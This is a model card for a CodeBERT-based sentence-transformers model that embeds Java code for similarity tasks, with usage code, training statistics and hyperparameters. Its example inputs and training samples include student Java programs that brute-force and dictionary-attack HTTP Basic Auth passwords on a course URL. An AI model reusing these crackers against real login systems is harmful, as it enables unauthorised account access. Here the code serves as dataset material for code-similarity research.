SentenceTransformer based on microsoft/codebert-base
This is a sentence-transformers model fine-tuned from microsoft/codebert-base. It maps sentences and paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
Model Details
Model Description
- Model Type: Sentence Transformer
- Base model: microsoft/codebert-base
- Maximum Sequence Length: 512 tokens
- Output Dimensionality: 768 dimensions
- Similarity Function: Cosine Similarity
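The cosine similarity named in the list above can be illustrated with a minimal pure-Python sketch. The helper name `cosine_similarity` and the toy 3-dimensional vectors are illustrative assumptions; embeddings from this model have 768 dimensions.

```python
import math


def cosine_similarity(u, v):
    """Cosine of the angle between two equal-length vectors."""
    if len(u) != len(v):
        raise ValueError("vectors must have the same length")
    dot = sum(a * b for a, b in zip(u, v))
    norm_u = math.sqrt(sum(a * a for a in u))
    norm_v = math.sqrt(sum(b * b for b in v))
    if norm_u == 0.0 or norm_v == 0.0:
        raise ValueError("cosine similarity is undefined for a zero vector")
    return dot / (norm_u * norm_v)


# Toy vectors (hypothetical, not model output).
a = [1.0, 2.0, 3.0]
b = [2.0, 4.0, 6.0]   # same direction as a
c = [-3.0, 0.0, 1.0]  # orthogonal to a

print(cosine_similarity(a, b))  # close to 1.0
print(cosine_similarity(a, c))  # close to 0.0
```

Because the score depends only on direction, scaling an embedding does not change its similarity to other embeddings.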
Model Sources
- Documentation: Sentence Transformers Documentation
- Repository: Sentence Transformers on GitHub
- Hugging Face: Sentence Transformers on Hugging Face
Full Model Architecture
SentenceTransformer(
(0): Transformer({'max_seq_length': 512, 'do_lower_case': False}) with Transformer model: RobertaModel
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
)
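The Pooling module above has only `pooling_mode_mean_tokens` enabled, so the sentence embedding is the average of the token embeddings. A minimal pure-Python sketch of that idea follows; the function name `mean_pool`, the attention-mask handling, and the toy 2-dimensional vectors are illustrative assumptions, not the library's implementation.

```python
def mean_pool(token_embeddings, attention_mask):
    """Average the token vectors whose mask entry is 1; padding is ignored."""
    dim = len(token_embeddings[0])
    summed = [0.0] * dim
    count = 0
    for vector, keep in zip(token_embeddings, attention_mask):
        if keep:
            count += 1
            for i, value in enumerate(vector):
                summed[i] += value
    if count == 0:
        raise ValueError("attention mask selects no tokens")
    return [s / count for s in summed]


# Two real tokens followed by one padding token (hypothetical values).
tokens = [[1.0, 2.0], [3.0, 4.0], [100.0, 100.0]]
mask = [1, 1, 0]

sentence_embedding = mean_pool(tokens, mask)
print(sentence_embedding)  # [2.0, 3.0]
```

The padding vector does not affect the result because its mask entry is 0.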
Usage
Direct Usage (Sentence Transformers)
First install the Sentence Transformers library:
pip install -U sentence-transformers
Then you can load this model and run inference.
from sentence_transformers import SentenceTransformer
# Download from the 🤗 Hub
model = SentenceTransformer("buelfhood/SOCO-Java-CodeBERT-ST")
# Run inference
sentences = [
'\nimport java.net.*;\nimport java.io.*;\n\n\npublic class Dictionary\n{\n private String myUsername = "";\n private String myPassword = "";\n private String urlToCrack = "http://sec-crack.cs.rmit.edu./SEC/2";\n\n\n public static void main (String args[])\n {\n Dictionary d = new Dictionary();\n }\n\n public Dictionary()\n {\n generatePassword();\n }\n\n \n\n public void generatePassword()\n {\n try\n {\n BufferedReader = new BufferedReader(new FileReader("/usr/share/lib/dict/words"));\n\n \n {\n myPassword = bf.readLine();\n crackPassword(myPassword);\n } while (myPassword != null);\n }\n catch(IOException e)\n { }\n }\n\n\n \n\n public void crackPassword(String passwordToCrack)\n {\n String data, dataToEncode, encodedData;\n\n try\n {\n URL url = new URL (urlToCrack);\n\n \n\n dataToEncode = myUsername + ":" + passwordToCrack;\n\n \n\n encodedData = new bf.misc.BASE64Encoder().encode(dataToEncode.getBytes());\n\n URLConnection urlCon = url.openConnection();\n urlCon.setRequestProperty ("Authorization", " " + encodedData);\n\n InputStream is = (InputStream)urlCon.getInputStream();\n InputStreamReader isr = new InputStreamReader(is);\n BufferedReader bf = new BufferedReader (isr);\n\n \n {\n data = bf.readLine();\n System.out.println(data);\n displayPassword(passwordToCrack);\n } while (data != null);\n }\n catch (IOException e)\n { }\n }\n\n\n public void displayPassword(String foundPassword)\n {\n System.out.println("\\nThe cracked password is : " + foundPassword);\n System.exit(0);\n }\n}\n\n\n',
'\nimport java.io.*;\n\npublic class PasswordFile {\n \n private String strFilepath;\n private String strCurrWord;\n private File fWordFile;\n private BufferedReader in;\n \n \n public PasswordFile(String filepath) {\n strFilepath = filepath;\n try {\n fWordFile = new File(strFilepath);\n in = new BufferedReader(new FileReader(fWordFile));\n }\n catch(Exception e)\n {\n System.out.println("Could not open file " + strFilepath);\n }\n }\n \n String getPassword() {\n return strCurrWord;\n }\n \n String getNextPassword() {\n try {\n strCurrWord = in.readLine();\n \n \n \n }\n catch (Exception e)\n {\n \n return null;\n }\n \n return strCurrWord;\n }\n \n}\n',
'\n\n\nimport java.misc.BASE64Encoder;\nimport java.misc.BASE64Decoder;\n\nimport java.io.*;\nimport java.net.*;\nimport java.util.*;\n\n\npublic class BruteForce {\n \n static char [] passwordDataSet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz".toCharArray();\n \n private int indices[] = {0,0,0};\n \n private String url = null;\n\n \n public BruteForce(String url) {\n this.url = url;\n\n }\n \n private int attempts = 0;\n private boolean stopGen = false;\n \n public String getNextPassword(){\n String nextPassword = "";\n for(int i = 0; i <indices.length ; i++){\n if(indices[indices.length -1 ] == passwordDataSet.length)\n return null;\n if(indices[i] == passwordDataSet.length ){\n indices[i] = 0;\n indices[i+1]++;\n }\n nextPassword = passwordDataSet[indices[i]]+nextPassword;\n\n if(i == 0)\n indices[0]++;\n\n }\n return nextPassword;\n }\n \n public void setIndices(int size){\n this.indices = new int[size];\n for(int i = 0; i < size; i++)\n this.indices[i] = 0;\n }\n public void setPasswordDataSet(String newDataSet){\n this.passwordDataSet = newDataSet.toCharArray();\n }\n \n public String crackPassword(String user) throws IOException, MalformedURLException{\n URL url = null;\n URLConnection urlConnection = null;\n String outcome = null;\n String authorization = null;\n String password = null;\n BASE64Encoder b64enc = new BASE64Encoder();\n InputStream content = null;\n BufferedReader in = null;\n String line;\n int i = 0;\n while(!"HTTP/1.1 200 OK".equalsIgnoreCase(outcome)){\n url = new URL(this.url);\n urlConnection = url.openConnection();\n urlConnection.setDoInput(true);\n urlConnection.setDoOutput(true);\n\n\n urlConnection.setRequestProperty("GET", url.getPath() + " HTTP/1.1");\n urlConnection.setRequestProperty("Host", url.getHost());\n password = getNextPassword();\n if(password == null)\n return null;\n System.out.print(password);\n authorization = user + ":" + password;\n\n\n urlConnection.setRequestProperty("Authorization", " "+ 
b64enc.encode(authorization.getBytes()));\n\n\noutcome = urlConnection.getHeaderField(null); \n\n\n\n this.attempts ++;\n urlConnection = null;\n url = null;\n\n if(this.attempts%51 == 0)\n for(int b = 0; b < 53;b++)\n System.out.print("\\b \\b");\n else\n System.out.print("\\b\\b\\b.");\n\n }\n return password;\n }\n \n public int getAttempts(){\n return this.attempts;\n }\n public static void main (String[] args) {\n if(args.length != 2){\n System.out.println("usage: java attacks.BruteForce <url crack: e.g. http://sec-crack.cs.rmit.edu./SEC/2/> <username: e.g. >");\n System.exit(1);\n }\n\n BruteForce bruteForce1 = new BruteForce(args[0]);\n try{\n Calendar cal1=null, cal2=null;\n cal1 = Calendar.getInstance();\n System.out.println("Cracking started at: " + cal1.getTime().toString());\n String password = bruteForce1.crackPassword(args[1]);\n if(password != null)\n System.out.println("\\nPassword is: "+password);\n else\n System.out.println("\\nPassword could not retrieved!");\n cal2 = Calendar.getInstance();\n System.out.println("Cracking finished at: " + cal2.getTime().toString());\n Date d3 = new Date(cal2.getTime().getTime() - cal1.getTime().getTime());\n System.out.println("Total Time taken crack: " + (d3.getTime())/1000 + " sec");\n System.out.println("Total attempts : " + bruteForce1.getAttempts());\n\n }catch(MalformedURLException mue){\n mue.printStackTrace();\n }\n\n catch(IOException ioe){\n ioe.printStackTrace();\n }\n }\n}',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# (3, 768)
# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities.shape)
# torch.Size([3, 3])
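One way to read the pairwise similarity matrix is to rank every distinct pair of snippets by score. The sketch below assumes the matrix has been converted to a nested list; the helper name `rank_pairs` and the scores in `toy_similarities` are hypothetical and are not output from this model.

```python
def rank_pairs(similarities):
    """Return (score, i, j) for every pair i < j, highest score first."""
    pairs = []
    n = len(similarities)
    for i in range(n):
        for j in range(i + 1, n):
            pairs.append((similarities[i][j], i, j))
    return sorted(pairs, reverse=True)


# Hypothetical scores for three snippets; not produced by this model.
toy_similarities = [
    [1.00, 0.35, 0.80],
    [0.35, 1.00, 0.20],
    [0.80, 0.20, 1.00],
]

for score, i, j in rank_pairs(toy_similarities):
    print(f"snippets {i} and {j}: {score:.2f}")
```

With real output, `similarities.tolist()` should give a nested list of this shape, since `model.similarity` returns a PyTorch tensor.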
Training Details
Training Dataset
Unnamed Dataset
- Size: 33,411 training samples
- Columns: sentence_0, sentence_1, and label
- Approximate statistics based on the first 1000 samples:
 | sentence_0 | sentence_1 | label |
---|---|---|---|
type | string | string | int |
details | min: 61 tokens, mean: 471.36 tokens, max: 512 tokens | min: 61 tokens, mean: 491.01 tokens, max: 512 tokens | 0: ~99.50%, 1: ~0.50% |
- Samples:
sentence_0 sentence_1 label
public class ImageFile
{
private String imageUrl;
private int imageSize;
public ImageFile(String url, int size)
{
imageUrl=url;
imageSize=size;
}
public String getImageUrl()
{
return imageUrl;
}
public int getImageSize()
{
return imageSize;
}
}
import java.net.*;
import java.io.*;
import java.util.Date;
public class MyMail implements Serializable
{
public static final int SMTPPort = 25;
public static final char successPrefix = '2';
public static final char morePrefix = '3';
public static final char failurePrefix = '4';
private static final String CRLF = "\r\n";
private String mailFrom = "";
private String mailTo = "";
private String messageSubject = "";
private String messageBody = "";
private String mailServer = "";
public MyMail ()
{
super();
}
public MyMail ( String serverName)
{
super();
mailServer = serverName;
}
public String getFrom()
{
return mailFrom;
}
public String getTo()
{
return mailTo;
}
public String getSubject()
{
return messageSubject;
}
public String getMessage()
{
return messageBody;
}
public String getMailServer()
{
return mailServer;
}
public void setFrom( String from )
{
mailFr...
0
import java.util.*;
import java.net.*;
import java.io.*;
public class WatchDog
{
private Vector init;
public WatchDog()
{
try
{
Runtime run = Runtime.getRuntime();
String command_line = "lynx http://www.cs.rmit.edu./students/ -dump";
Process result = run.exec(command_line);
BufferedReader in = new BufferedReader(new InputStreamReader(result.getInputStream()));
String inputLine;
init = new Vector();
while ((inputLine = in.readLine()) != null)
{
init.addElement(inputLine);
}
}catch(Exception e)
{
}
}
public static void main(String args[])
{
WatchDog wd = new WatchDog();
wd.nextRead();
}
public void nextRead()
{
while(true)
{
ScheduleTask sch = new ScheduleTask(init);
if(sch.getFlag()!=0)
{
System.out.println("change happen");
WatchDog wd = new WatchDog();
wd.nextRead();
}
}
}
}
import java.net.*;
import java.io.*;
import java.util.*;
public class Dictionary{
private static URL location;
private static String user;
private BufferedReader input;
private static BufferedReader dictionary;
private int maxLetters = 3;
public Dictionary() {
Authenticator.setDefault(new MyAuthenticator ());
startTime = System.currentTimeMillis();
boolean passwordMatched = false;
while (!passwordMatched) {
try {
input = new BufferedReader(new InputStreamReader(location.openStream()));
String line = input.readLine();
while (line != null) {
System.out.println(line);
line = input.readLine();
}
input.close();
passwordMatched = true;
}
catch (ProtocolException e)
{
}
catch (ConnectException e) {
System.out.println("Failed connect");
}
catch (IOException e) ...
0
import java.util.*;
import java.net.*;
import java.io.*;
public class ScheduleTask extends Thread
{
private int flag=0,count1=0,count2=0;
private Vector change;
public ScheduleTask(Vector init)
{
try
{
Runtime run = Runtime.getRuntime();
String command_line = "lynx http://yallara.cs.rmit.edu./~/index.html -dump";
Process result = run.exec(command_line);
BufferedReader in = new BufferedReader(new InputStreamReader(result.getInputStream()));
String inputLine;
Vector newVector = new Vector();
change = new Vector();
while ((inputLine = in.readLine()) != null)
{
newVector.addElement(inputLine);
}
if(init.size()>newVector.size())
{
for(int k=0;k {
if(!newVector.elementAt(k).toString().equals(init.elementAt(k).toString()))
ch...
import java.io.*;
import java.net.*;
import java.util.*;
public class Dictionary
{
public static void main (String args[])
{
Calendar cal = Calendar.getInstance();
Date now=cal.getTime();
double startTime = now.getTime();
String password=getPassword(startTime);
System.out.println("The password is " + password);
}
public static String getPassword(double startTime)
{
String password="";
int requests=0;
try
{
FileReader fRead = new FileReader("/usr/share/lib/dict/words");
BufferedReader buf = new BufferedReader(fRead);
password=buf.readLine();
while (password != null)
{
if (password.length()<=3)
{
requests++;
if (testPassword(password, startTime, requests))
return password;
}
password = buf.readLine();
}
}
catch (IOException ioe)
{
}
return password;
}
private static boolean testPassword(String password, double startTime, int requests)
{
try
{
U...
0
- Loss: BatchAllTripletLoss
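To make the loss named above concrete, here is a minimal pure-Python sketch of a batch-all triplet loss: every valid (anchor, positive, negative) triplet in a batch contributes a hinge term. The function names, the Euclidean distance, the margin of 1.0, and the choice to average only over triplets that violate the margin are assumptions for illustration; the library implementation works on tensors and may differ in detail.

```python
import math


def euclidean(u, v):
    """Euclidean distance between two equal-length vectors."""
    return math.sqrt(sum((a - b) ** 2 for a, b in zip(u, v)))


def batch_all_triplet_loss(embeddings, labels, margin=1.0):
    """Mean hinge loss over all valid triplets that violate the margin."""
    losses = []
    n = len(embeddings)
    for a in range(n):
        for p in range(n):
            # A positive shares the anchor's label but is a different item.
            if p == a or labels[p] != labels[a]:
                continue
            for neg in range(n):
                # A negative has a different label from the anchor.
                if labels[neg] == labels[a]:
                    continue
                d_pos = euclidean(embeddings[a], embeddings[p])
                d_neg = euclidean(embeddings[a], embeddings[neg])
                loss = d_pos - d_neg + margin
                if loss > 0:
                    losses.append(loss)
    return sum(losses) / len(losses) if losses else 0.0


# Toy 1-dimensional embeddings (hypothetical values).
toy_embeddings = [[0.0], [1.0], [1.5]]
toy_labels = [0, 0, 1]
print(batch_all_triplet_loss(toy_embeddings, toy_labels))  # 1.0
```

In the toy batch, two triplets violate the margin with losses 0.5 and 1.5, so the mean is 1.0. A batch whose classes are already well separated yields 0.0.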
Training Hyperparameters
Non-Default Hyperparameters
- per_device_train_batch_size: 16
- per_device_eval_batch_size: 16
- num_train_epochs: 1
- multi_dataset_batch_sampler: round_robin
All Hyperparameters
- overwrite_output_dir: False
- do_predict: False
- eval_strategy: no
- prediction_loss_only: True
- per_device_train_batch_size: 16
- per_device_eval_batch_size: 16
- per_gpu_train_batch_size: None
- per_gpu_eval_batch_size: None
- gradient_accumulation_steps: 1
- eval_accumulation_steps: None
- torch_empty_cache_steps: None
- learning_rate: 5e-05
- weight_decay: 0.0
- adam_beta1: 0.9
- adam_beta2: 0.999
- adam_epsilon: 1e-08
- max_grad_norm: 1
- num_train_epochs: 1
- max_steps: -1
- lr_scheduler_type: linear
- lr_scheduler_kwargs: {}
- warmup_ratio: 0.0
- warmup_steps: 0
- log_level: passive
- log_level_replica: warning
- log_on_each_node: True
- logging_nan_inf_filter: True
- save_safetensors: True
- save_on_each_node: False
- save_only_model: False
- restore_callback_states_from_checkpoint: False
- no_cuda: False
- use_cpu: False
- use_mps_device: False
- seed: 42
- data_seed: None
- jit_mode_eval: False
- use_ipex: False
- bf16: False
- fp16: False
- fp16_opt_level: O1
- half_precision_backend: auto
- bf16_full_eval: False
- fp16_full_eval: False
- tf32: None
- local_rank: 0
- ddp_backend: None
- tpu_num_cores: None
- tpu_metrics_debug: False
- debug: []
- dataloader_drop_last: False
- dataloader_num_workers: 0
- dataloader_prefetch_factor: None
- past_index: -1
- disable_tqdm: False
- remove_unused_columns: True
- label_names: None
- load_best_model_at_end: False
- ignore_data_skip: False
- fsdp: []
- fsdp_min_num_params: 0
- fsdp_config: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
- fsdp_transformer_layer_cls_to_wrap: None
- accelerator_config: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
- deepspeed: None
- label_smoothing_factor: 0.0
- optim: adamw_torch
- optim_args: None
- adafactor: False
- group_by_length: False
- length_column_name: length
- ddp_find_unused_parameters: None
- ddp_bucket_cap_mb: None
- ddp_broadcast_buffers: False
- dataloader_pin_memory: True
- dataloader_persistent_workers: False
- skip_memory_metrics: True
- use_legacy_prediction_loop: False
- push_to_hub: False
- resume_from_checkpoint: None
- hub_model_id: None
- hub_strategy: every_save
- hub_private_repo: None
- hub_always_push: False
- gradient_checkpointing: False
- gradient_checkpointing_kwargs: None
- include_inputs_for_metrics: False
- include_for_metrics: []
- eval_do_concat_batches: True
- fp16_backend: auto
- push_to_hub_model_id: None
- push_to_hub_organization: None
- mp_parameters:
- auto_find_batch_size: False
- full_determinism: False
- torchdynamo: None
- ray_scope: last
- ddp_timeout: 1800
- torch_compile: False
- torch_compile_backend: None
- torch_compile_mode: None
- include_tokens_per_second: False
- include_num_input_tokens_seen: False
- neftune_noise_alpha: None
- optim_target_modules: None
- batch_eval_metrics: False
- eval_on_start: False
- use_liger_kernel: False
- eval_use_gather_object: False
- average_tokens_across_devices: False
- prompts: None
- batch_sampler: batch_sampler
- multi_dataset_batch_sampler: round_robin
Training Logs
Epoch | Step | Training Loss |
---|---|---|
0.2393 | 500 | 0.1875 |
0.4787 | 1000 | 0.1815 |
0.7180 | 1500 | 0.24 |
0.9574 | 2000 | 0.1596 |
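The Epoch column in the table above can be cross-checked against the reported dataset size and batch size. The sketch below assumes single-device training (`num_devices = 1` is an assumption; the card does not state the device count) and uses the reported `gradient_accumulation_steps` of 1 and `dataloader_drop_last` of False.

```python
import math

num_samples = 33_411  # training set size reported in this card
batch_size = 16       # per_device_train_batch_size
num_devices = 1       # assumption: single-device training

# With dataloader_drop_last = False, the final partial batch still counts.
steps_per_epoch = math.ceil(num_samples / (batch_size * num_devices))
print(steps_per_epoch)  # 2089


def epoch_fraction(step):
    """Fraction of one epoch completed after the given optimizer step."""
    return round(step / steps_per_epoch, 4)


for step in (500, 1000, 1500, 2000):
    print(step, epoch_fraction(step))
```

Under these assumptions the computed fractions (0.2393, 0.4787, 0.718, 0.9574) agree with the logged Epoch values.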
Framework Versions
- Python: 3.11.13
- Sentence Transformers: 4.1.0
- Transformers: 4.52.4
- PyTorch: 2.6.0+cu124
- Accelerate: 1.7.0
- Datasets: 3.6.0
- Tokenizers: 0.21.1
Citation
BibTeX
Sentence Transformers
@inproceedings{reimers-2019-sentence-bert,
title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
author = "Reimers, Nils and Gurevych, Iryna",
booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
month = "11",
year = "2019",
publisher = "Association for Computational Linguistics",
url = "https://arxiv.org/abs/1908.10084",
}
BatchAllTripletLoss
@misc{hermans2017defense,
title={In Defense of the Triplet Loss for Person Re-Identification},
author={Alexander Hermans and Lucas Beyer and Bastian Leibe},
year={2017},
eprint={1703.07737},
archivePrefix={arXiv},
primaryClass={cs.CV}
}